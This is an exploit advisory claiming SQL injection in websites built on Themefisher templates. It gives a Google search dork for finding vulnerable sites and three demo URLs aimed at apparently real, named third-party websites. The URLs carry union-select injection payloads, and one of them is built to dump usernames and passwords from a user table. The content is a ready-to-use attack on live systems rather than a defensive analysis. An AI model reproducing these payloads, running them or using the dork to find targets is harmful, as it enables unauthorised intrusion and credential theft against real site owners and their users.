*********************************************************
#Exploit Title: Themefisher - Sql Injection Vulnerability
#Date: 2022-02-20
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designed & Developed by Themefisher"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Designed & Developed by Themefisher"
### Demo :
https://www.pestrust.edu.in/pespschool/post.php?id=-21%27%20union%20select%201,2,3,4,5,group_concat(username,0x3a3a,pass),7,8%20from%20tbl_user--+
https://gierslev.com/product.php?id=-39%20union%20select%201,version(),3,4,5,6,7,8,9,10--
https://zaneprah.com/views/product-single.php?id=-10%27%20union%20select%201,2,3,version(),5,6,7,8--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************